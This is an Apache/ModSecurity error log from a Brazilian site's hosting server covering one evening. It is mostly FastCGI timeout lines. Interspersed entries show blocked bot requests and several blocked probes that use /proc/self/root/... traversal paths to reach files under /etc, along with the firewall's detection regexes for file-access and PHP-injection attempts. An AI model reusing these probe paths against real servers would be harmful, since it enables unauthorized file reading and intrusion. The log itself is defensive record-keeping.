[Wed Mar 18 17:58:04.509910 2026] [proxy_fcgi:error] [pid 9800:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:58:28.565801 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59722] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:59:27.349797 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59784] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:59:55.927444 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:00:17.135760 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:00:39.533824 2026] [proxy_fcgi:error] [pid 9333:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60240] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:01:20.109829 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60280] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:01:42.881809 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:02:06.345979 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60560] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:03:15.889845 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60654] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:04:01.246456 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:04:41.062238 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:05:17.250478 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:32798] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:06:20.173862 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32842] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:06:44.453855 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:32948] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:07:38.878902 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.228.61:59432] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absUGsdf6f5d65gmYZQWZgAAAsM"]
[Wed Mar 18 18:07:44.421815 2026] [proxy_fcgi:error] [pid 9530:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:07:46.805442 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.244.43:37306] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absUIvu8EFLIOrSqIps_mQAAAlc"]
[Wed Mar 18 18:08:24.805896 2026] [proxy_fcgi:error] [pid 9530:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:09:12.045849 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33214] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:09:34.342657 2026] [proxy_fcgi:error] [pid 9800:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33608] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:09:56.265850 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:10:41.329971 2026] [proxy_fcgi:error] [pid 9530:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33818] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:11:14.810015 2026] [proxy_fcgi:error] [pid 9800:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33876] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:11:36.606734 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33978] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:11:59.633873 2026] [proxy_fcgi:error] [pid 9800:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34058] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:12:35.753657 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34084] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:12:51.667910 2026] [:error] [pid 23798:tid 140411649607424] [client 74.7.244.43:49732] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absVUz-9rzzdA3Ti0NCSwQAAAYs"]
[Wed Mar 18 18:12:57.645803 2026] [proxy_fcgi:error] [pid 23798:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34264] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:12:59.503583 2026] [:error] [pid 23798:tid 140411649607424] [client 74.7.228.61:46716] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absVWz-9rzzdA3Ti0NCSxwAAAYs"]
[Wed Mar 18 18:13:20.089215 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34324] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:14:18.189840 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:14:47.761851 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34450] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:16:15.361204 2026] [proxy_fcgi:error] [pid 9800:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34550] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:17:47.165855 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34686] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:18:12.809932 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34944] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:18:16.548540 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.244.43:35332] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absWmAbLMZ6AikZjR9UAsgAAAA4"]
[Wed Mar 18 18:19:18.293830 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35008] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:19:55.805537 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] [client 179.188.53.243:35070] AH01067: Failed to read FastCGI header
[Wed Mar 18 18:19:55.805593 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (104)Connection reset by peer: [client 179.188.53.243:35070] AH01075: Error dispatching request to : 
[Wed Mar 18 18:20:27.000209 2026] [proxy_fcgi:error] [pid 9333:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:20:48.470113 2026] [proxy_fcgi:error] [pid 9333:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35524] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:21:27.964547 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:22:47.275203 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:23:16.169847 2026] [proxy_fcgi:error] [pid 9800:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:23:16.447240 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.244.43:39668] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absXxOyqAr6etmhZHNoJqAAAAEs"]
[Wed Mar 18 18:24:15.985946 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35952] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:24:42.433869 2026] [proxy_fcgi:error] [pid 9333:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36066] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:25:11.253831 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36132] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:26:28.061951 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36180] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:26:56.613870 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36370] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:28:15.976729 2026] [proxy_fcgi:error] [pid 9530:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36398] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:28:19.904922 2026] [:error] [pid 9530:tid 140411691570944] [client 74.7.244.43:34852] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absY8wSuyh5UNeevTVfmBQAAAwY"]
[Wed Mar 18 18:28:40.373902 2026] [proxy_fcgi:error] [pid 14269:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36632] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:29:21.808046 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36668] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:30:03.950128 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36708] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:30:47.915761 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36774] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:31:56.941790 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:33:15.913793 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36956] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:33:38.151454 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37384] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:33:59.201931 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37548] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:34:34.561895 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:35:17.673207 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:36:13.664430 2026] [:error] [pid 27403:tid 140411699963648] [client 216.73.216.191:22654] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absazRkFeYa1D6dYQnCN_wAAAcU"]
[Wed Mar 18 18:36:35.969840 2026] [proxy_fcgi:error] [pid 9800:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37718] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:37:03.609882 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:38:15.985862 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:39:09.053983 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38090] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:39:16.890996 2026] [:error] [pid 27293:tid 140411666392832] [client 216.73.216.191:36000] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf)|gz(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:gz)?file|dir)|(?:proc_|bz)open|call_user_func))\\\\b" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "9"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: proc_open found within ARGS:fileloc: //opt/lc/php/7.0/include/php/ext/standard/proc_open.h"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absbhP-YZRR_7pZ7nDIy4gAAA8k"]
[Wed Mar 18 18:39:31.176335 2026] [:error] [pid 29882:tid 140411725141760] [client 216.73.216.191:23569] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf)|gz(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:gz)?file|dir)|(?:proc_|bz)open|call_user_func))\\\\b" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_phpinjection.conf"] [line "9"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: proc_open found within ARGS:fileloc: //opt/lc/php/5.4/include/php/ext/standard/proc_open.h"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absbk0zinOy1jxa1j4dfcwAAAQI"]
[Wed Mar 18 18:39:55.982403 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38148] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:40:17.105930 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38632] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:40:42.709907 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38860] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:41:04.607152 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.228.61:38214] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absb8AkwaGbbGflqUZBUxQAAAMs"]
[Wed Mar 18 18:41:25.453552 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39174] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:43:17.557888 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39446] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:43:40.736960 2026] [proxy_fcgi:error] [pid 23798:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39652] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:44:11.870345 2026] [proxy_fcgi:error] [pid 29882:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39770] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:44:56.899428 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40006] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:45:48.917856 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40138] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:46:10.183723 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40376] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:46:31.057832 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40686] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:46:36.115019 2026] [:error] [pid 9333:tid 140411574073088] [client 74.7.228.61:39480] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absdPA_eYRmh974Uj6QEVAAAApQ"]
[Wed Mar 18 18:46:50.565914 2026] [:error] [pid 15826:tid 140411582465792] [client 216.73.216.191:29555] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absdSuoXxyEfFpUF8f-2sgAAAVM"]
[Wed Mar 18 18:47:03.193429 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:4134] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 18:47:03.193630 2026] [access_compat:error] [pid 17653:tid 140411616036608] [client 216.73.216.191:4134] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Wed Mar 18 18:47:06.994363 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41042] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:47:07.684780 2026] [:error] [pid 17653:tid 140411616036608] [client 216.73.216.191:42579] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absdW8df6f5d65gmYZQWrgAAAs8"]
[Wed Mar 18 18:47:44.374114 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41190] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:48:06.360673 2026] [:error] [pid 27293:tid 140411674785536] [client 216.73.216.191:35114] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absdlv-YZRR_7pZ7nDIzIQAAA8g"]
[Wed Mar 18 18:48:40.853820 2026] [proxy_fcgi:error] [pid 23798:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41250] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:49:14.965919 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41298] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:49:55.674052 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.244.43:45610] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abseAymAPhZkrhU8w4mq_wAAAJI"]
[Wed Mar 18 18:50:19.674603 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:50:19.928070 2026] [:error] [pid 11816:tid 140411741927168] [client 216.73.216.191:41678] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abseG-w_le52K8_3pV0csAAAAgA"]
[Wed Mar 18 18:51:08.315441 2026] [proxy_fcgi:error] [pid 29882:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41532] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:51:35.841431 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] [client 179.188.53.243:41700] AH01067: Failed to read FastCGI header
[Wed Mar 18 18:51:35.841493 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (104)Connection reset by peer: [client 179.188.53.243:41700] AH01075: Error dispatching request to : 
[Wed Mar 18 18:51:59.424062 2026] [proxy_fcgi:error] [pid 9333:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42114] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:52:51.203398 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42300] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:53:34.709887 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:54:15.568004 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:54:53.021889 2026] [proxy_fcgi:error] [pid 9800:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42870] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 18:55:09.329047 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.244.43:36292] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absfPRkFeYa1D6dYQnCOcwAAAdU"]
